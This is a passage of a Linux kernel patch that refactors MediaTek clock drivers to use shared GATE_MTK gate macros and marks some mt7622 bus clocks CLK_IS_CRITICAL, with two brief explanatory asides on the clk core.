+-	.regs = &mm1_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr,		\
+-}
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	GATE_MM0(CLK_MM_SMI_COMMON, "mm_smi_common", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6797-vdec.c b/drivers/clk/mediatek/clk-mt6797-vdec.c
+index 6120fccc859f1..8622ddd87a5bb 100644
+--- a/drivers/clk/mediatek/clk-mt6797-vdec.c
++++ b/drivers/clk/mediatek/clk-mt6797-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x0008,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {		\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &vdec0_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr_inv,		\
+-}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {		\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &vdec1_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr_inv,		\
+-}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	GATE_VDEC0(CLK_VDEC_CKEN_ENG, "vdec_cken_eng", "vdec_sel", 8),
+diff --git a/drivers/clk/mediatek/clk-mt6797-venc.c b/drivers/clk/mediatek/clk-mt6797-venc.c
+index 834d3834d2bbc..928d611a476e4 100644
+--- a/drivers/clk/mediatek/clk-mt6797-venc.c
++++ b/drivers/clk/mediatek/clk-mt6797-venc.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_0, "venc_0", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6797.c b/drivers/clk/mediatek/clk-mt6797.c
+index b89f325a4b9b8..78339cb35beb0 100644
+--- a/drivers/clk/mediatek/clk-mt6797.c
++++ b/drivers/clk/mediatek/clk-mt6797.c
+@@ -420,40 +420,22 @@ static const struct mtk_gate_regs infra2_cg_regs = {
+ 	.sta_ofs = 0x00b0,
+ };
+ 
+-#define GATE_ICG0(_id, _name, _parent, _shift) {		\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra0_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-}
++#define GATE_ICG0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG1(_id, _name, _parent, _shift)			\
+-	GATE_ICG1_FLAGS(_id, _name, _parent, _shift, 0)
++#define GATE_ICG1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG1_FLAGS(_id, _name, _parent, _shift, _flags) {	\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra1_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-	.flags = _flags,					\
+-}
++#define GATE_ICG1_FLAGS(_id, _name, _parent, _shift, _flags)		\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra1_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, _flags)
+ 
+-#define GATE_ICG2(_id, _name, _parent, _shift)			\
+-	GATE_ICG2_FLAGS(_id, _name, _parent, _shift, 0)
++#define GATE_ICG2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG2_FLAGS(_id, _name, _parent, _shift, _flags) {	\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra2_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-	.flags = _flags,					\
+-}
++#define GATE_ICG2_FLAGS(_id, _name, _parent, _shift, _flags)		\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra2_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, _flags)
+ 
+ /*
+  * Clock gates dramc and dramc_b are needed by the DRAM controller.
+diff --git a/drivers/clk/mediatek/clk-mt7622-aud.c b/drivers/clk/mediatek/clk-mt7622-aud.c
+index 9f2e5aa7b5d9b..b17731fa11445 100644
+--- a/drivers/clk/mediatek/clk-mt7622-aud.c
++++ b/drivers/clk/mediatek/clk-mt7622-aud.c
+@@ -16,41 +16,17 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO2(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO3(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio3_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate_regs audio0_cg_regs = {
+ 	.set_ofs = 0x0,
+diff --git a/drivers/clk/mediatek/clk-mt7622-eth.c b/drivers/clk/mediatek/clk-mt7622-eth.c
+index 43de0477d5d99..a60190e834186 100644
+--- a/drivers/clk/mediatek/clk-mt7622-eth.c
++++ b/drivers/clk/mediatek/clk-mt7622-eth.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.set_ofs = 0x30,
+@@ -45,14 +39,8 @@ static const struct mtk_gate_regs sgmii_cg_regs = {
+ 	.sta_ofs = 0xE4,
+ };
+ 
+-#define GATE_SGMII(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &sgmii_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SGMII(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &sgmii_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii_clks[] = {
+ 	GATE_SGMII(CLK_SGMII_TX250M_EN, "sgmii_tx250m_en",
+diff --git a/drivers/clk/mediatek/clk-mt7622-hif.c b/drivers/clk/mediatek/clk-mt7622-hif.c
+index 67e96231dd25b..55baa6d06a205 100644
+--- a/drivers/clk/mediatek/clk-mt7622-hif.c
++++ b/drivers/clk/mediatek/clk-mt7622-hif.c
+@@ -16,23 +16,11 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_PCIE(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &pcie_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PCIE(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &pcie_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_SSUSB(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ssusb_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SSUSB(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ssusb_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs pcie_cg_regs = {
+ 	.set_ofs = 0x30,
+diff --git a/drivers/clk/mediatek/clk-mt7622.c b/drivers/clk/mediatek/clk-mt7622.c
+index 3b55f8641fae0..eebbb87906930 100644
+--- a/drivers/clk/mediatek/clk-mt7622.c
++++ b/drivers/clk/mediatek/clk-mt7622.c
+@@ -50,59 +50,28 @@
+ 		 _pd_reg, _pd_shift, _tuner_reg, _pcw_reg, _pcw_shift,  \
+ 		 NULL, "clkxtal")
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &apmixed_cg_regs,				\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,			\
+-	}
++#define GATE_APMIXED_AO(_id, _name, _parent, _shift)			\
++	GATE_MTK_FLAGS(_id, _name, _parent, &apmixed_cg_regs, _shift,	\
++		 &mtk_clk_gate_ops_no_setclr_inv, CLK_IS_CRITICAL)
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &infra_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &top0_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr,			\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &top1_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr,			\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &peri0_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &peri1_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_PERI0_AO(_id, _name, _parent, _shift)			\
++	GATE_MTK_FLAGS(_id, _name, _parent, &peri0_cg_regs, _shift,	\
++		 &mtk_clk_gate_ops_setclr, CLK_IS_CRITICAL)
++
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static DEFINE_SPINLOCK(mt7622_clk_lock);
+ 
+@@ -350,7 +319,7 @@ static const struct mtk_pll_data plls[] = {
+ };
+ 
+ static const struct mtk_gate apmixed_clks[] = {
+-	GATE_APMIXED(CLK_APMIXED_MAIN_CORE_EN, "main_core_en", "mainpll", 5),
++	GATE_APMIXED_AO(CLK_APMIXED_MAIN_CORE_EN, "main_core_en", "mainpll", 5),
+ };
+ 
+ static const struct mtk_gate infra_clks[] = {
+@@ -485,7 +454,7 @@ static const struct mtk_gate peri_clks[] = {
+ 	GATE_PERI0(CLK_PERI_AP_DMA_PD, "peri_ap_dma_pd", "axi_sel", 12),
+ 	GATE_PERI0(CLK_PERI_MSDC30_0_PD, "peri_msdc30_0", "msdc30_0_sel", 13),
+ 	GATE_PERI0(CLK_PERI_MSDC30_1_PD, "peri_msdc30_1", "msdc30_1_sel", 14),
+-	GATE_PERI0(CLK_PERI_UART0_PD, "peri_uart0_pd", "axi_sel", 17),
++	GATE_PERI0_AO(CLK_PERI_UART0_PD, "peri_uart0_pd", "axi_sel", 17),
+ 	GATE_PERI0(CLK_PERI_UART1_PD, "peri_uart1_pd", "axi_sel", 18),
+ 	GATE_PERI0(CLK_PERI_UART2_PD, "peri_uart2_pd", "axi_sel", 19),
+ 	GATE_PERI0(CLK_PERI_UART3_PD, "peri_uart3_pd", "axi_sel", 20),
+@@ -513,12 +482,12 @@ static struct mtk_composite infra_muxes[] = {
+ 
+ static struct mtk_composite top_muxes[] = {
+ 	/* CLK_CFG_0 */
+-	MUX_GATE(CLK_TOP_AXI_SEL, "axi_sel", axi_parents,
+-		 0x040, 0, 3, 7),
+-	MUX_GATE(CLK_TOP_MEM_SEL, "mem_sel", mem_parents,
+-		 0x040, 8, 1, 15),
+-	MUX_GATE(CLK_TOP_DDRPHYCFG_SEL, "ddrphycfg_sel", ddrphycfg_parents,
+-		 0x040, 16, 1, 23),
++	MUX_GATE_FLAGS(CLK_TOP_AXI_SEL, "axi_sel", axi_parents,
++		       0x040, 0, 3, 7, CLK_IS_CRITICAL),
++	MUX_GATE_FLAGS(CLK_TOP_MEM_SEL, "mem_sel", mem_parents,
++		       0x040, 8, 1, 15, CLK_IS_CRITICAL),
++	MUX_GATE_FLAGS(CLK_TOP_DDRPHYCFG_SEL, "ddrphycfg_sel", ddrphycfg_parents,
++		       0x040, 16, 1, 23, CLK_IS_CRITICAL),
+ 	MUX_GATE(CLK_TOP_ETH_SEL, "eth_sel", eth_parents,
+ 		 0x040, 24, 3, 31),
+ 
+@@ -655,10 +624,6 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+ 			       clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_AXI_SEL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_MEM_SEL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_DDRPHYCFG_SEL]->clk);
+-
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+ 
+@@ -701,9 +666,6 @@ static int mtk_apmixedsys_init(struct platform_device *pdev)
+ 	mtk_clk_register_gates(node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_APMIXED_ARMPLL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_APMIXED_MAIN_CORE_EN]->clk);
+-
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+ 
+@@ -730,8 +692,6 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 	if (r)
+ 		return r;
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_PERI_UART0_PD]->clk);
+-
+ 	mtk_register_reset_controller_with_dev(&pdev->dev, &clk_rst_desc[1]);
+ 
+ 	return 0;
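
The mt7622 conversion above replaces the hand-rolled clk_prepare_enable() calls in the probe functions with CLK_IS_CRITICAL on the affected gates and muxes, so the common clk core keeps those clocks running itself. Roughly what the core does at registration time (a paraphrase of __clk_core_init() in drivers/clk/clk.c, error handling trimmed):

	if (core->flags & CLK_IS_CRITICAL) {
		ret = clk_core_prepare(core);
		if (ret)
			goto out;

		ret = clk_core_enable(core);
		if (ret) {
			clk_core_unprepare(core);
			goto out;
		}
	}

Flagging the clock critical also closes the window between registration and the old explicit enable, during which an apparently unused bus clock could have been gated.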
+diff --git a/drivers/clk/mediatek/clk-mt7629-eth.c b/drivers/clk/mediatek/clk-mt7629-eth.c
+index 282dd65594654..b0c8fa3b8bbec 100644
+--- a/drivers/clk/mediatek/clk-mt7629-eth.c
++++ b/drivers/clk/mediatek/clk-mt7629-eth.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt7629-clk.h>
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.set_ofs = 0x30,
+@@ -45,14 +39,8 @@ static const struct mtk_gate_regs sgmii_cg_regs = {
+ 	.sta_ofs = 0xE4,
+ };
+ 
+-#define GATE_SGMII(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &sgmii_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SGMII(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &sgmii_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii_clks[2][4] = {
+ 	{
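
All of the per-bank macros converted in these MediaTek drivers now expand through the shared helpers from drivers/clk/mediatek/clk-gate.h, which look essentially like this (paraphrased, not copied verbatim):

	#define GATE_MTK_FLAGS(_id, _name, _parent, _regs, _shift,	\
			       _ops, _flags) {				\
			.id = _id,					\
			.name = _name,					\
			.parent_name = _parent,				\
			.regs = _regs,					\
			.shift = _shift,				\
			.ops = _ops,					\
			.flags = _flags,				\
		}

	#define GATE_MTK(_id, _name, _parent, _regs, _shift, _ops)	\
		GATE_MTK_FLAGS(_id, _name, _parent, _regs, _shift, _ops, 0)

Each driver keeps only its bank-specific register block and ops choice, so the refactor is behavior-neutral as long as the ops argument matches the one the old open-coded initializer used.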
+diff --git a/drivers/clk/mediatek/clk-mt7629-hif.c b/drivers/clk/mediatek/clk-mt7629-hif.c
+index 0c8b9e1397890..3628811a2f57f 100644
+--- a/drivers/clk/mediatek/clk-mt7629-hif.c
++++ b/drivers/clk/mediatek/clk-mt7629-hif.c
+@@ -16,23 +16,11 @@
+ 
+ #include <dt-bindings/clock/mt7629-clk.h>
+ 
+-#define GATE_PCIE(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &pcie_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PCIE(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &pcie_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_SSUSB(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ssusb_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SSUSB(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ssusb_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs pcie_cg_regs = {
+ 	.set_ofs = 0x30,
+diff --git a/drivers/clk/mediatek/clk-mt7629.c b/drivers/clk/mediatek/clk-mt7629.c
+index e4a08c811adc2..0bc88b7d171b5 100644
+--- a/drivers/clk/mediatek/clk-mt7629.c
++++ b/drivers/clk/mediatek/clk-mt7629.c
+@@ -50,41 +50,17 @@
+ 		_pd_reg, _pd_shift, _tuner_reg, _pcw_reg, _pcw_shift,	\
+ 		NULL, "clk20m")
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &apmixed_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_APMIXED(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &apmixed_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static DEFINE_SPINLOCK(mt7629_clk_lock);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt7986-eth.c b/drivers/clk/mediatek/clk-mt7986-eth.c
+index 7868c0728e962..c21e1d672384a 100644
+--- a/drivers/clk/mediatek/clk-mt7986-eth.c
++++ b/drivers/clk/mediatek/clk-mt7986-eth.c
+@@ -22,12 +22,8 @@ static const struct mtk_gate_regs sgmii0_cg_regs = {
+ 	.sta_ofs = 0xe4,
+ };
+ 
+-#define GATE_SGMII0(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &sgmii0_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_SGMII0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &sgmii0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii0_clks[] __initconst = {
+ 	GATE_SGMII0(CLK_SGMII0_TX250M_EN, "sgmii0_tx250m_en", "top_xtal", 2),
+@@ -42,12 +38,8 @@ static const struct mtk_gate_regs sgmii1_cg_regs = {
+ 	.sta_ofs = 0xe4,
+ };
+ 
+-#define GATE_SGMII1(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &sgmii1_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_SGMII1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &sgmii1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii1_clks[] __initconst = {
+ 	GATE_SGMII1(CLK_SGMII1_TX250M_EN, "sgmii1_tx250m_en", "top_xtal", 2),
+@@ -62,12 +54,8 @@ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.sta_ofs = 0x30,
+ };
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift)                                  \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &eth_cg_regs, .shift = _shift,                         \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate eth_clks[] __initconst = {
+ 	GATE_ETH(CLK_ETH_FE_EN, "eth_fe_en", "netsys_2x_sel", 6),
+diff --git a/drivers/clk/mediatek/clk-mt7986-infracfg.c b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+index 49666047bf0ed..74e68a7197301 100644
+--- a/drivers/clk/mediatek/clk-mt7986-infracfg.c
++++ b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+@@ -87,26 +87,14 @@ static const struct mtk_gate_regs infra2_cg_regs = {
+ 	.sta_ofs = 0x68,
+ };
+ 
+-#define GATE_INFRA0(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra0_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA0(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_INFRA1(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra1_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA1(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_INFRA2(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra2_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA2(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	/* INFRA0 */
+diff --git a/drivers/clk/mediatek/clk-mt8135.c b/drivers/clk/mediatek/clk-mt8135.c
+index b68888a034c40..3ea06d2ec2f11 100644
+--- a/drivers/clk/mediatek/clk-mt8135.c
++++ b/drivers/clk/mediatek/clk-mt8135.c
+@@ -2,6 +2,8 @@
+ /*
+  * Copyright (c) 2014 MediaTek Inc.
+  * Author: James Liao <jamesjj.liao@mediatek.com>
++ * Copyright (c) 2023 Collabora, Ltd.
